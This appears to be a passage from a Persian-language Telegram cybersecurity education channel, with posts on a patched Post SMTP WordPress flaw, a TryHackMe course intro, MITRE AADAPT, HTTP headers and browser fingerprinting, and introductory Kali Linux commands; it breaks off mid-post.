Account_Takeover_Vulnerability_Affecting_Over_400K_Installations.pdf
444.5 KB
🔖 آسیب پذیری تصاحب حساب (Account Takeover) که بیش از ۴۰۰ هزار نصب را تحت تأثیر قرار داده بود، در افزونه Post SMTP برطرف شد.
افزونه Post SMTP که بیش از ۴۰۰ هزار نصب دارد، یک افزونه ارسال ایمیل برای وردپرس است. این افزونه به مدیران سایت اجازه میدهد سرویس های ایمیل سفارشی را تنظیم کنند و ابزارهایی مثل لاگ برداری ایمیل، اعتبارسنجی DNS و پشتیبانی از OAuth را برای راحت تر کردن ارسال ایمیل در وردپرس ارائه میدهد. توسعه دهنده این افزونه از تیم WPExperts است.
@TryHackBox
افزونه Post SMTP که بیش از ۴۰۰ هزار نصب دارد، یک افزونه ارسال ایمیل برای وردپرس است. این افزونه به مدیران سایت اجازه میدهد سرویس های ایمیل سفارشی را تنظیم کنند و ابزارهایی مثل لاگ برداری ایمیل، اعتبارسنجی DNS و پشتیبانی از OAuth را برای راحت تر کردن ارسال ایمیل در وردپرس ارائه میدهد. توسعه دهنده این افزونه از تیم WPExperts است.
@TryHackBox
👍5🔥4
🔖 TryHackMe Course - Pre Security | قسمت 00
💢 قسمت ۰۰ – معرفی دوره TryHackMe
🔴 درود به همه علاقهمندان امنیت سایبری!
در این مسیر آموزشی، ما قدم به قدم با استفاده از محتوای رسمی سایت TryHackMe پیش میرویم؛ یک پلتفرم آموزشی معتبر و بسیار کاربردی در حوزه هک اخلاقی و امنیت سایبری.
تمام مفاهیم و چالشهایی که در این دوره میبینید دقیقاً مطابق با آنچه در سایت TryHackMe ارائه شده است، طراحی شدهاند.
هدف ما این است که با تمرین و آموزش عملی روی محیطهای واقعی و چالشهای کاربردی، مهارتهای شما را در زمینه امنیت سایبری به شکل چشمگیری ارتقا دهیم.
پس اگر آمادهاید، همراه ما باشید تا این مسیر جذاب را با هم طی کنیم و قدم در دنیای حرفهای امنیت سایبری بگذاریم!
📌 برای دیدن ویدئو روی لینک زیر کلیک کنید :
🧩 https://youtu.be/jvSC8GJ3MWQ?si=0EE3mKY4CQtXlSEF
➖➖➖➖➖➖➖➖
🆔 @TryHackBox
💢 قسمت ۰۰ – معرفی دوره TryHackMe
🔴 درود به همه علاقهمندان امنیت سایبری!
در این مسیر آموزشی، ما قدم به قدم با استفاده از محتوای رسمی سایت TryHackMe پیش میرویم؛ یک پلتفرم آموزشی معتبر و بسیار کاربردی در حوزه هک اخلاقی و امنیت سایبری.
تمام مفاهیم و چالشهایی که در این دوره میبینید دقیقاً مطابق با آنچه در سایت TryHackMe ارائه شده است، طراحی شدهاند.
هدف ما این است که با تمرین و آموزش عملی روی محیطهای واقعی و چالشهای کاربردی، مهارتهای شما را در زمینه امنیت سایبری به شکل چشمگیری ارتقا دهیم.
پس اگر آمادهاید، همراه ما باشید تا این مسیر جذاب را با هم طی کنیم و قدم در دنیای حرفهای امنیت سایبری بگذاریم!
📌 برای دیدن ویدئو روی لینک زیر کلیک کنید :
🧩 https://youtu.be/jvSC8GJ3MWQ?si=0EE3mKY4CQtXlSEF
➖➖➖➖➖➖➖➖
🆔 @TryHackBox
❤14
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :
💠 کانال های تلگرام ما
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
🔶 کانال PFKSecurity از جمله پوشش APT , CVE , Exploit و موارد دیگر :
🆔 @PfkSecurity
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
💠 کانال های تلگرام ما
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
🔶 کانال PFKSecurity از جمله پوشش APT , CVE , Exploit و موارد دیگر :
🆔 @PfkSecurity
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
❤5
Forwarded from P.F.K Security
https://aadapt.mitre.org/
MITRE AADAPT™
(اقدامات مخرب در فناوری های پرداخت دارایی دیجیتال) یک پایگاه دانش جامع است که تاکتیک ها و تکنیک های مهاجمان علیه سامانه های مدیریت دارایی دیجیتال را بر اساس حملات واقعی، مشاهدات و آسیب پذیری ها مستند میکند.
ساختار AADAPT مشابه فریم ورک معروف MITRE ATT&CK طراحی شده و تاکتیک ها و تکنیک هایش مکمل ATT&CK هستند.
در ماتریس AADAPT، هر ستون نمایانگر یک تاکتیک حمله است و تکنیک های مرتبط با دارایی دیجیتال زیر هر تاکتیک قرار دارند. مواردی که با نماد & مشخص شده اند، تکنیک ها یا زیرتکنیک های ATT&CK هستند که در زمینه دارایی دیجیتال نیز کاربرد دارند و جزئیات این ارتباط در ضمیمه های AADAPT توضیح داده شده است. با کلیک روی هر مورد، میتوانید توضیحات بیشتری بخوانید یا از طریق نوار بالا، تاکتیک ها و تکنیک های AADAPT را مرور کنید.
@PfkSecurity
MITRE AADAPT™
(اقدامات مخرب در فناوری های پرداخت دارایی دیجیتال) یک پایگاه دانش جامع است که تاکتیک ها و تکنیک های مهاجمان علیه سامانه های مدیریت دارایی دیجیتال را بر اساس حملات واقعی، مشاهدات و آسیب پذیری ها مستند میکند.
ساختار AADAPT مشابه فریم ورک معروف MITRE ATT&CK طراحی شده و تاکتیک ها و تکنیک هایش مکمل ATT&CK هستند.
در ماتریس AADAPT، هر ستون نمایانگر یک تاکتیک حمله است و تکنیک های مرتبط با دارایی دیجیتال زیر هر تاکتیک قرار دارند. مواردی که با نماد & مشخص شده اند، تکنیک ها یا زیرتکنیک های ATT&CK هستند که در زمینه دارایی دیجیتال نیز کاربرد دارند و جزئیات این ارتباط در ضمیمه های AADAPT توضیح داده شده است. با کلیک روی هر مورد، میتوانید توضیحات بیشتری بخوانید یا از طریق نوار بالا، تاکتیک ها و تکنیک های AADAPT را مرور کنید.
@PfkSecurity
❤5
🚀 پارت 0 (A)
شناسایی کلاینتها و کوکیها (Client Identification and Cookies)
در دنیای وب، سرورها ممکن است همزمان با هزاران کلاینت مختلف در تعامل باشند. اما چطور یک سرور میتواند تشخیص دهد که درخواست دریافتی از سوی چه کسی بوده یا به کدام کاربر تعلق دارد؟ به طور پیشفرض، پروتکل HTTP stateless (بیحالت) است، یعنی هر درخواست، مستقل از درخواستهای قبلی در نظر گرفته میشود.
برای حل این چالش، سرورها نیاز دارند بتوانند هویت کاربران را تشخیص داده و پیگیری کنند. این شناسایی امکانپذیر نیست مگر با استفاده از یکسری تکنیکها و فناوریهایی که به کمک آنها، هر کاربر یا کلاینت به صورت یکتا قابل ردیابی خواهد بود.
در این سری، به بررسی روشهایی میپردازیم که سرورها از آنها برای شناسایی کاربران بهره میبرند. این روشها هم در معماری شبکه اهمیت دارند و هم در امنیت وب، زیرا بسیاری از حملات و مکانیزمهای دفاعی (مثل تشخیص نشستهای غیرمجاز، پیگیری رفتار مشکوک و جلوگیری از جعل هویت) به همین مکانیزمهای شناسایی وابستهاند.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
شناسایی کلاینتها و کوکیها (Client Identification and Cookies)
در دنیای وب، سرورها ممکن است همزمان با هزاران کلاینت مختلف در تعامل باشند. اما چطور یک سرور میتواند تشخیص دهد که درخواست دریافتی از سوی چه کسی بوده یا به کدام کاربر تعلق دارد؟ به طور پیشفرض، پروتکل HTTP stateless (بیحالت) است، یعنی هر درخواست، مستقل از درخواستهای قبلی در نظر گرفته میشود.
برای حل این چالش، سرورها نیاز دارند بتوانند هویت کاربران را تشخیص داده و پیگیری کنند. این شناسایی امکانپذیر نیست مگر با استفاده از یکسری تکنیکها و فناوریهایی که به کمک آنها، هر کاربر یا کلاینت به صورت یکتا قابل ردیابی خواهد بود.
در این سری، به بررسی روشهایی میپردازیم که سرورها از آنها برای شناسایی کاربران بهره میبرند. این روشها هم در معماری شبکه اهمیت دارند و هم در امنیت وب، زیرا بسیاری از حملات و مکانیزمهای دفاعی (مثل تشخیص نشستهای غیرمجاز، پیگیری رفتار مشکوک و جلوگیری از جعل هویت) به همین مکانیزمهای شناسایی وابستهاند.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
👍6🔥1
🚀 پارت 0 (B)
بررسی The Personal Touch در وب مدرن
پروتکل HTTP ذاتاً یک پروتکل stateless یا بدونحالت است؛ یعنی سرور هیچگونه اطلاعاتی از درخواستهای قبلی کلاینت نگه نمیدارد. هر بار که مرورگر شما درخواستی به سرور ارسال میکند، سرور آن را بهصورت مستقل پردازش کرده و پاسخ میدهد، بدون اینکه "بداند" چه کسی درخواست را فرستاده است.
اما این رفتار، برای سرویسهای امروزی وب قابلقبول نیست. اکثر وبسایتهای مدرن میخواهند تجربهای شخصیسازیشده به کاربران ارائه دهند؛ چیزی که به آن The Personal Touch میگوییم. این یعنی سایت باید بداند شما کی هستید، سابقه تعامل شما چیست، و بتواند شما را در جریان بازدیدهای بعدی شناسایی کند.
برخی کاربردهای مهم Personal Touch:
✨ خوشآمدگویی شخصی: نمایش نام کاربر یا محتوای مخصوص او
🎯 پیشنهادهای هدفمند: ارائه محصول یا محتوا بر اساس رفتار قبلی شما
🧾 اطلاعات ذخیرهشده: عدم نیاز به وارد کردن مکرر اطلاعات (مانند آدرس یا کارت بانکی)
🛒 ردیابی سشن: نگهداشتن وضعیت سبد خرید یا فرمهای چندمرحلهای
📎 اما چطور این کار را در HTTP بدونحالت انجام میدهند؟
برای رسیدن به این هدف، تکنیکها و فناوریهای مختلفی ابداع شدهاند که به سرورها اجازه میدهند هویت کاربران را شناسایی و پیگیری کنند. برخی از این تکنیکها:
🔹Headerهای HTTP:
شامل اطلاعاتی مانند User-Agent، زبان، نوع مرورگر و…
🔹IP Address:
استفاده از آدرس IP برای شناسایی تقریبی کاربران
🔹Authentication:
شناسایی کاربران با ورود (Login) و احراز هویت
🔹Fat URLs:
قرار دادن اطلاعات شناسایی در آدرسها (نه چندان ایمن!)
🔹Cookies:
یکی از مهمترین روشها برای نگهداری وضعیت (State) کاربر
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
بررسی The Personal Touch در وب مدرن
پروتکل HTTP ذاتاً یک پروتکل stateless یا بدونحالت است؛ یعنی سرور هیچگونه اطلاعاتی از درخواستهای قبلی کلاینت نگه نمیدارد. هر بار که مرورگر شما درخواستی به سرور ارسال میکند، سرور آن را بهصورت مستقل پردازش کرده و پاسخ میدهد، بدون اینکه "بداند" چه کسی درخواست را فرستاده است.
اما این رفتار، برای سرویسهای امروزی وب قابلقبول نیست. اکثر وبسایتهای مدرن میخواهند تجربهای شخصیسازیشده به کاربران ارائه دهند؛ چیزی که به آن The Personal Touch میگوییم. این یعنی سایت باید بداند شما کی هستید، سابقه تعامل شما چیست، و بتواند شما را در جریان بازدیدهای بعدی شناسایی کند.
برخی کاربردهای مهم Personal Touch:
✨ خوشآمدگویی شخصی: نمایش نام کاربر یا محتوای مخصوص او
🎯 پیشنهادهای هدفمند: ارائه محصول یا محتوا بر اساس رفتار قبلی شما
🧾 اطلاعات ذخیرهشده: عدم نیاز به وارد کردن مکرر اطلاعات (مانند آدرس یا کارت بانکی)
🛒 ردیابی سشن: نگهداشتن وضعیت سبد خرید یا فرمهای چندمرحلهای
📎 اما چطور این کار را در HTTP بدونحالت انجام میدهند؟
برای رسیدن به این هدف، تکنیکها و فناوریهای مختلفی ابداع شدهاند که به سرورها اجازه میدهند هویت کاربران را شناسایی و پیگیری کنند. برخی از این تکنیکها:
🔹Headerهای HTTP:
شامل اطلاعاتی مانند User-Agent، زبان، نوع مرورگر و…
🔹IP Address:
استفاده از آدرس IP برای شناسایی تقریبی کاربران
🔹Authentication:
شناسایی کاربران با ورود (Login) و احراز هویت
🔹Fat URLs:
قرار دادن اطلاعات شناسایی در آدرسها (نه چندان ایمن!)
🔹Cookies:
یکی از مهمترین روشها برای نگهداری وضعیت (State) کاربر
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
👍4❤1
🔐 آنچه مردم از امنیت سایبری تصور میکنند:
👨💻 شکار کردن هدف و نوشیدن قهوه ☕️
📊 آنچه واقعاً هست:
جلسات، ریست رمزها، باز کردن اکانتها، مستندسازی، پچ کردن، مدیریت تامینکنندهها، پاسخ به رخدادها و...
🎯 امنیت سایبری فقط شکار کردن هدف نیست، بلکه دنیایی از وظایف روتین، تیممحور و پیشگیرانه است.
✍️نویسنده
@TryHackBox | The Chaos
👨💻 شکار کردن هدف و نوشیدن قهوه ☕️
📊 آنچه واقعاً هست:
جلسات، ریست رمزها، باز کردن اکانتها، مستندسازی، پچ کردن، مدیریت تامینکنندهها، پاسخ به رخدادها و...
🎯 امنیت سایبری فقط شکار کردن هدف نیست، بلکه دنیایی از وظایف روتین، تیممحور و پیشگیرانه است.
✍️نویسنده
@TryHackBox | The Chaos
🔥3
مقدمه: تست نفوذ چیست؟
تست نفوذ یک چرخه مداوم از تحقیق و حمله علیه یک هدف یا مرز است. این حمله باید به صورت ساختاریافته، محاسبهشده و در صورت امکان، در یک محیط آزمایشگاهی تأیید شود، قبل از اینکه بر روی یک هدف واقعی اجرا گردد. ما فرآیند یک تست نفوذ را به این صورت نشان میدهیم:
همانطور که مدل نشان میدهد، هرچه اطلاعات بیشتری جمعآوری کنید، احتمال موفقیت نفوذ بالاتر میرود. پس از اینکه از مرز اولیه هدف عبور کردید، معمولاً چرخه را دوباره از سر میگیرید. به عنوان مثال، ممکن است اطلاعاتی درباره شبکه داخلی جمعآوری کنید تا به صورت عمیقتر در آن نفوذ کنید.
✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
تست نفوذ یک چرخه مداوم از تحقیق و حمله علیه یک هدف یا مرز است. این حمله باید به صورت ساختاریافته، محاسبهشده و در صورت امکان، در یک محیط آزمایشگاهی تأیید شود، قبل از اینکه بر روی یک هدف واقعی اجرا گردد. ما فرآیند یک تست نفوذ را به این صورت نشان میدهیم:
همانطور که مدل نشان میدهد، هرچه اطلاعات بیشتری جمعآوری کنید، احتمال موفقیت نفوذ بالاتر میرود. پس از اینکه از مرز اولیه هدف عبور کردید، معمولاً چرخه را دوباره از سر میگیرید. به عنوان مثال، ممکن است اطلاعاتی درباره شبکه داخلی جمعآوری کنید تا به صورت عمیقتر در آن نفوذ کنید.
✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
👍7❤2
مقدمه: آشنایی با کالی لینوکس: قسمت اول
در ابتدا که لینوکس را نصب کرده اید، هم نام کاربری و هم رمز عبور اولیه شما kali است:
Username:
Password:
ماشین مجازی کالی لینوکس شامل دو کاربر پیشفرض به نامهای "root" و "kali" خواهد بود. ما از حساب کاربری "kali" استفاده خواهیم کرد. هرچند ممکن است وسوسهانگیز باشد که با کاربر "root" وارد شوید، اما این کار توصیه نمیشود. کاربر "root" دسترسی نامحدود دارد و یک فرمان اشتباه میتواند به سیستم ما آسیب برساند. بدتر از آن، اگر یک مهاجم بتواند از یک فرآیند در حال اجرا با دسترسی "root" سوءاستفاده کند، کنترل کامل ماشین ما را به دست خواهد گرفت.
بسیاری از دستورات برای اجرا به دسترسیهای سطح بالا نیاز دارند؛ خوشبختانه، دستور
پیشنهاد میشود که همان اول رمز عبور خود را در ترمینال با کامند
✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
در ابتدا که لینوکس را نصب کرده اید، هم نام کاربری و هم رمز عبور اولیه شما kali است:
Username:
kali
Password:
kali
ماشین مجازی کالی لینوکس شامل دو کاربر پیشفرض به نامهای "root" و "kali" خواهد بود. ما از حساب کاربری "kali" استفاده خواهیم کرد. هرچند ممکن است وسوسهانگیز باشد که با کاربر "root" وارد شوید، اما این کار توصیه نمیشود. کاربر "root" دسترسی نامحدود دارد و یک فرمان اشتباه میتواند به سیستم ما آسیب برساند. بدتر از آن، اگر یک مهاجم بتواند از یک فرآیند در حال اجرا با دسترسی "root" سوءاستفاده کند، کنترل کامل ماشین ما را به دست خواهد گرفت.
بسیاری از دستورات برای اجرا به دسترسیهای سطح بالا نیاز دارند؛ خوشبختانه، دستور
sudo
میتواند این مشکل را حل کند. ما عبارت sudo
را قبل از دستوری که میخواهیم اجرا کنیم وارد کرده و در صورت درخواست، رمز عبور خود را وارد میکنیم.پیشنهاد میشود که همان اول رمز عبور خود را در ترمینال با کامند
passwd
تغییر دهید:✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
👍7🔥1
🚀 پارت 1 (A)
بررسی HTTP Headers و شناسایی کاربران
در HTTP، هدرهای درخواست (Request Headers) اطلاعاتی درباره کاربر، مرورگر، مسیر ورود و تنظیمات کلاینت ارائه میدهند. برخی از این هدرها به سرور کمک میکنند تا کاربر را شناسایی یا ردیابی کند؛ حتی زمانی که ورود (Login) انجام نشده باشد.
در این پست، به بررسی ۷ هدر پرکاربرد در شناسایی کلاینتها میپردازیم:
1️⃣ From
این هدر شامل آدرس ایمیل کاربر است و در گذشته به عنوان راهی برای شناسایی کاربران در نظر گرفته میشد.
🔴 اما امروز، مرورگرها معمولاً این هدر را ارسال نمیکنند چون میتواند منجر به سوءاستفادههایی مانند اسپم یا فیشینگ شود.
🛑 در عمل، From یک هدر تقریباً منسوخ و ناامن محسوب میشود.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
بررسی HTTP Headers و شناسایی کاربران
در HTTP، هدرهای درخواست (Request Headers) اطلاعاتی درباره کاربر، مرورگر، مسیر ورود و تنظیمات کلاینت ارائه میدهند. برخی از این هدرها به سرور کمک میکنند تا کاربر را شناسایی یا ردیابی کند؛ حتی زمانی که ورود (Login) انجام نشده باشد.
در این پست، به بررسی ۷ هدر پرکاربرد در شناسایی کلاینتها میپردازیم:
1️⃣ From
این هدر شامل آدرس ایمیل کاربر است و در گذشته به عنوان راهی برای شناسایی کاربران در نظر گرفته میشد.
🔴 اما امروز، مرورگرها معمولاً این هدر را ارسال نمیکنند چون میتواند منجر به سوءاستفادههایی مانند اسپم یا فیشینگ شود.
🛑 در عمل، From یک هدر تقریباً منسوخ و ناامن محسوب میشود.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
🔥4
🚀 پارت 1 (B)
بررسی HTTP Headers و شناسایی کاربران
2️⃣ User-Agent
شامل اطلاعات دقیق درباره مرورگر، نسخه آن، سیستمعامل و گاهی معماری سیستم است.
مثال:
🔍 کاربرد امنیتی: ترکیب این اطلاعات میتواند در ساخت یک پروفایل نسبی از کلاینت استفاده شود. اگر ترکیب User-Agent خاصی فقط توسط یک کاربر استفاده شود، سرور میتواند آن را شناسایی کند.
3️⃣ Referer
مشخص میکند که کاربر از کدام صفحه یا سایت به این صفحه فعلی رسیده است.
✅ کاربردها:
* تحلیل رفتار کاربران
* ردگیری مسیر بازدید (Path Tracking)
* شناسایی منابع ترافیک (مثلاً از Google آمده یا از یک سایت تبلیغاتی)
⚠️ از منظر امنیتی، این هدر میتواند اطلاعات حساس (مانند توکنها در URL) را نیز فاش کند، به همین دلیل در بسیاری از برنامههای امن، مقدار آن کنترل یا حذف میشود.
4️⃣ Accept-Language
مشخص میکند زبانهای ترجیحی کاربر چیست. برای مثال:
🌐 کاربردها:
* نمایش خودکار سایت به زبان مناسب
* شناسایی منطقه جغرافیایی کاربر
🎯 در کنار IP و User-Agent میتواند بخشی از پروفایل شناسایی کاربر را شکل دهد.
5️⃣ Accept
این هدر مشخص میکند که کلاینت چه نوع محتواهایی را پشتیبانی میکند (مثلاً HTML، JSON یا XML).
نمونه:
🧩 اگرچه نقش مستقیمی در شناسایی ندارد، ولی ترکیب خاص مقادیر این هدر میتواند بهصورت غیرمستقیم در Fingerprinting کاربر مفید باشد.
6️⃣ Accept-Encoding
بیان میکند که چه الگوریتمهای فشردهسازی (مثل gzip یا br) توسط کلاینت پشتیبانی میشوند.
🛡 اگرچه هدف اصلی آن کاهش حجم پاسخ است، اما باز هم میتواند بخشی از اثر انگشت مرورگر (Browser Fingerprint) را بسازد.
7️⃣ DNT (Do Not Track)
این هدر اعلام میکند که آیا کاربر میخواهد ردیابی نشود (Do Not Track).
مقدار آن معمولاً
🚫 این هدر غیرالزامی و داوطلبانه است، و بسیاری از سرورها آن را نادیده میگیرند.
📌 جمعبندی:
درست است که هیچکدام از این هدرها بهتنهایی برای شناسایی دقیق کافی نیستند، اما ترکیب آنها میتواند به ساخت اثر انگشت دیجیتال (Fingerprint) کمک کند. این روشها پایه بسیاری از سامانههای تشخیص تقلب، تبلیغات هدفمند، یا حتی حملات مبتنی بر شناسایی مرورگر هستند.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
بررسی HTTP Headers و شناسایی کاربران
2️⃣ User-Agent
شامل اطلاعات دقیق درباره مرورگر، نسخه آن، سیستمعامل و گاهی معماری سیستم است.
مثال:
Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
🔍 کاربرد امنیتی: ترکیب این اطلاعات میتواند در ساخت یک پروفایل نسبی از کلاینت استفاده شود. اگر ترکیب User-Agent خاصی فقط توسط یک کاربر استفاده شود، سرور میتواند آن را شناسایی کند.
3️⃣ Referer
مشخص میکند که کاربر از کدام صفحه یا سایت به این صفحه فعلی رسیده است.
✅ کاربردها:
* تحلیل رفتار کاربران
* ردگیری مسیر بازدید (Path Tracking)
* شناسایی منابع ترافیک (مثلاً از Google آمده یا از یک سایت تبلیغاتی)
⚠️ از منظر امنیتی، این هدر میتواند اطلاعات حساس (مانند توکنها در URL) را نیز فاش کند، به همین دلیل در بسیاری از برنامههای امن، مقدار آن کنترل یا حذف میشود.
4️⃣ Accept-Language
مشخص میکند زبانهای ترجیحی کاربر چیست. برای مثال:
Accept-Language: fa-IR,fa;q=0.9,en-US;q=0.8,en;q=0.7
🌐 کاربردها:
* نمایش خودکار سایت به زبان مناسب
* شناسایی منطقه جغرافیایی کاربر
🎯 در کنار IP و User-Agent میتواند بخشی از پروفایل شناسایی کاربر را شکل دهد.
5️⃣ Accept
این هدر مشخص میکند که کلاینت چه نوع محتواهایی را پشتیبانی میکند (مثلاً HTML، JSON یا XML).
نمونه:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
🧩 اگرچه نقش مستقیمی در شناسایی ندارد، ولی ترکیب خاص مقادیر این هدر میتواند بهصورت غیرمستقیم در Fingerprinting کاربر مفید باشد.
6️⃣ Accept-Encoding
بیان میکند که چه الگوریتمهای فشردهسازی (مثل gzip یا br) توسط کلاینت پشتیبانی میشوند.
🛡 اگرچه هدف اصلی آن کاهش حجم پاسخ است، اما باز هم میتواند بخشی از اثر انگشت مرورگر (Browser Fingerprint) را بسازد.
7️⃣ DNT (Do Not Track)
این هدر اعلام میکند که آیا کاربر میخواهد ردیابی نشود (Do Not Track).
مقدار آن معمولاً
1
برای فعالبودن یا 0
برای غیرفعالبودن است.🚫 این هدر غیرالزامی و داوطلبانه است، و بسیاری از سرورها آن را نادیده میگیرند.
📌 جمعبندی:
درست است که هیچکدام از این هدرها بهتنهایی برای شناسایی دقیق کافی نیستند، اما ترکیب آنها میتواند به ساخت اثر انگشت دیجیتال (Fingerprint) کمک کند. این روشها پایه بسیاری از سامانههای تشخیص تقلب، تبلیغات هدفمند، یا حتی حملات مبتنی بر شناسایی مرورگر هستند.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
❤9🔥1🙏1
مقدمه: آشنایی با کالی لینوکس: قسمت دوم
کالی لینوکس از استاندارد سلسلهمراتب سیستم فایل (FHS) پیروی میکند که یک ساختار آشنا و جهانی برای تمام کاربران لینوکس فراهم میآورد. دایرکتوریهایی که بیشتر به کار شما خواهند آمد عبارتند از:
دایرکتوریهای دیگری نیز وجود دارند که به ندرت نیاز به ورود به آنها خواهید داشت، اما آشنایی خوب با ساختار سیستم فایل لینوکس، به شدت به کارایی شما کمک خواهد کرد.
✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
کالی لینوکس از استاندارد سلسلهمراتب سیستم فایل (FHS) پیروی میکند که یک ساختار آشنا و جهانی برای تمام کاربران لینوکس فراهم میآورد. دایرکتوریهایی که بیشتر به کار شما خواهند آمد عبارتند از:
/bin
- برنامههای پایه (مانند ls, cd, cat و غیره)/sbin
-
برنامههای سیستمی (مانند fdisk, mkfs, sysctl و غیره) /etc
- فایلهای پیکربندی/tmp
- فایلهای موقت (که معمولاً هنگام راهاندازی مجدد، حذف میشوند) /usr/bin
- برنامهها (مانند apt, ncat, nmap و غیره)/usr/share
- فایلهای پشتیبانی برنامه و دادههادایرکتوریهای دیگری نیز وجود دارند که به ندرت نیاز به ورود به آنها خواهید داشت، اما آشنایی خوب با ساختار سیستم فایل لینوکس، به شدت به کارایی شما کمک خواهد کرد.
✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
👍6❤2
XXE Cheat Sheet (2025 Update).pdf
626.8 KB
✏️ مقاله تالیف شده
XXE Cheat Sheet (2025 Update)
✍️نویسنده
@TryHackBox | The Chaos
#XEE #CheatSheet #CyberSecurity
XXE Cheat Sheet (2025 Update)
✍️نویسنده
@TryHackBox | The Chaos
#XEE #CheatSheet #CyberSecurity
👍4🔥4
مقدمه:آشنایی با کالی لینوکس: قسمت سوم: basic linux commands
1. man pages
دستور
استفاده:
بهعنوان مثال:
این دستور مستندات مربوط به دستور
2. apropos
دستور
استفاده:
بهعنوان مثال:
این دستور تمام دستورات و ابزارهایی که مرتبط با شبکه هستند را نمایش میدهد.
3. listing files & options
دستور
آپشنها:
*
*
*
*
استفاده:
این دستور لیست تمام فایلها و دایرکتوریها را بههمراه جزئیات نشان میدهد، حتی فایلهای مخفی.
4. cd
دستور
استفاده:
بهعنوان مثال:
این دستور شما را به دایرکتوری
نکات:
* اگر دستور
* استفاده از
5. pwd
شرح: دستور
استفاده:
این دستور مسیر دایرکتوری فعلی را نمایش میدهد، بهعنوان مثال:
بهعنوان مثال:
این دستور یک دایرکتوری به نام
آپشنها:
*
این دستور دایرکتوری
جمعبندی:
این دستورات جزو دستورات پایهای و مهم در لینوکس هستند که برای مدیریت دایرکتوریها، فایلها، و جستجو در مستندات سیستم استفاده میشوند. برای کار با Kali Linux و انجام تستهای نفوذ، این دستورات بسیار مهم هستند و اغلب در فرآیندهای مختلف استفاده میشوند.
✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
1. man pages
دستور
man
(مخفف Manual) به شما این امکان را میدهد که مستندات و راهنماهای مربوط به دستورات لینوکس را مشاهده کنید. هر دستور در لینوکس، مستندات یا "صفحات راهنما" دارد که توضیحاتی در مورد نحوه استفاده از آن دستور، آپشنها، و پارامترهای مختلف را ارائه میدهند.استفاده:
man <command>
بهعنوان مثال:
man ls
این دستور مستندات مربوط به دستور
ls
(که برای لیست کردن محتویات دایرکتوری استفاده میشود) را نمایش میدهد.2. apropos
دستور
apropos
به شما این امکان را میدهد که بهدنبال یک عبارت یا کلمه کلیدی در صفحات راهنمای لینوکس بگردید. این دستور بهویژه زمانی مفید است که شما بخواهید از دستورات موجود در سیستم برای انجام یک کار خاص آگاه شوید، اما دقیقا نمیدانید که چه دستوری برای انجام آن کار وجود دارد.استفاده:
apropos <keyword>
بهعنوان مثال:
apropos network
این دستور تمام دستورات و ابزارهایی که مرتبط با شبکه هستند را نمایش میدهد.
3. listing files & options
دستور
ls
برای لیست کردن فایلها و دایرکتوریها در یک دایرکتوری استفاده میشود. این دستور میتواند با آپشنهای مختلف برای نمایش اطلاعات بیشتر مانند جزئیات فایلها، ترتیب خاص و فیلترهای مختلف تنظیم شود.آپشنها:
*
-l
: نمایش اطلاعات بهصورت لیست (جزئیات فایلها مانند مجوزها، سایز، تاریخ و غیره).*
-a
: نمایش فایلهای مخفی (فایلهایی که نام آنها با نقطه شروع میشود).*
-h
: نمایش اندازه فایلها بهصورت خوانا (مثلاً 1K
, 234M
).*
-R
: نمایش محتویات دایرکتوریها بهصورت بازگشتی.استفاده:
ls -la
این دستور لیست تمام فایلها و دایرکتوریها را بههمراه جزئیات نشان میدهد، حتی فایلهای مخفی.
4. cd
دستور
cd
(مخفف "change directory") برای تغییر دایرکتوری فعلی در سیستم فایل استفاده میشود. با استفاده از این دستور میتوانید به دایرکتوریهای مختلف جابهجا شوید.استفاده:
cd <directory_path>
بهعنوان مثال:
cd /home/user/Documents
این دستور شما را به دایرکتوری
Documents
در مسیر /home/user/
منتقل میکند.نکات:
